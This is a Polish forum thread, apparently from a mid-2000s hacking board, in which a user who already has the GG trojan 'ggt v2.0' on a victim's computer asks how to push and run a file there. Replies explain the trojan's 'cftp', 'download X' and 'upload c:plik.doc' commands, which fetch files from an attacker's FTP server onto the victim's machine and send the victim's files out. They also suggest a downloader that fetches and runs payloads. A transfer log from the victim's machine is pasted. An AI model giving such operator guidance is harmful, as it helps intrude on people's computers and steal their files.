Drobne pytanko

tianhao

Użytkownik
Dołączył
Czerwiec 19, 2004
Posty
307
Mam takie pytanie czy w wersji ggt v2.0 jest tez taka mozliwosc zeby podac url z ktorego ma sciagnac plik i go odpalic z gory thx
<
<
 

-=A3Ro=-

Użytkownik
Dołączył
Lipiec 24, 2004
Posty
28
Mozes wykorzystac do tego program chochlika UCdownlader , ktory po odpaleniu u ofiarys ciaga z podanego urla plik i go odpala :-D
 

tianhao

Użytkownik
Dołączył
Czerwiec 19, 2004
Posty
307
Wiem o tym ale moja ofiara ma zainstalowanego serwa ggt v2.0 a kolejnego pliku juz sobie nieda wcisnac i chodzi mi wlasnie czy przy pomocy ggt mozna sciagnac plik z jakiegos ulr
 

Wojass

Użytkownik
Dołączył
Sierpień 22, 2003
Posty
347
no pewnie ze mozna komenda "cftp" czyli client ftp, potrzebny jest jakis serwer FTP ale to nie problem np. republika.pl
 

tianhao

Użytkownik
Dołączył
Czerwiec 19, 2004
Posty
307
ok mam juz adres ftp na interi ale tera co musze zrobic zeby u ofiary na dysku zapisla sie ten plik??
 

Wojass

Użytkownik
Dołączył
Sierpień 22, 2003
Posty
347
najpierw wrzuc na tego ftpka jakis plik ktory chcesz sciagnać do ofiary, potem w ggt piszesz cftp i ggt bedzie sie pytał o potrzebne informacje tj, adres FTP (np. ftp.republika.pl) potem login, hasło, numer portu (standart 21), tryb pasywny tak/nie , jak wszystko wpiszesz prawidłowo w okienku GG pojawi sie lista plikow na danym koncie ftp, kazdy plik ma przypisany numer, wiec piszesz " download X " gdzie X to numer pliku na tej liscie, plik zostanie sciagniety do folderu WINDOWS wiec tam go potem szukaj, jak chcesz wgrac jakis plik od ofiary na ftp piszesz np " upload c:plik.doc " , przy wiekszych plikach nie ma ograniczeń ograniczeniem jest tylko pojemnosc konta FTP, dodatkowo co 15 sekund GGT wysyła statystyke tj. predkosc transferu i czas do zakonczenia operacji
 

tianhao

Użytkownik
Dołączył
Czerwiec 19, 2004
Posty
307
sciagnolem na dysk ofiary plik
zemsta (19:49)
FTP-Status: Connecting to 217.74.65.162.
zemsta (19:49)
FTP-Status: Connected.
zemsta (19:49)
FTP-Status: Connection established
zemsta (19:49)
FTP-Status: Starting FTP transfer
zemsta (19:49)
FTP-Status: Transfer complete
gdzie teraz mam szukac sciagnietego pliku dodam ze ofiara ma xp bo w c:windows niema folderu download
wiec gdzie

sory ze mam takie problemy ale nieznam sie na tym
 

Wojass

Użytkownik
Dołączył
Sierpień 22, 2003
Posty
347
nie sciagasz foldru tylko plik, daj na ftp`a np. mojplik.exe , musisz go widziec na liscie np Nr 5 - mojplik.exe i wtedy dajesz polecenie download 5 , i plik sie sciaga luzem do folderu WINDOWS nie koniecznie do C:Windows to zalezy gdzie jest zainstalowany system i moze byc np. D:Windows,
 

tianhao

Użytkownik
Dołączył
Czerwiec 19, 2004
Posty
307
dalem na ftp nazwe gg6.0 i dalem na download 0 bo mial on numer 0 i gdzie teraz mam szukac tego pliku zeby go odpalic. Wiem ze system jest zainstalowany na dysku c. Ale jest w xp kilka proffili
 

Wojass

Użytkownik
Dołączył
Sierpień 22, 2003
Posty
347
bez urazy ale chyba masz problem z czytaniem tekstu ze zrozumieniem , juz napisałem w FOLDERZE WINDOWS !
 
Do góry Bottom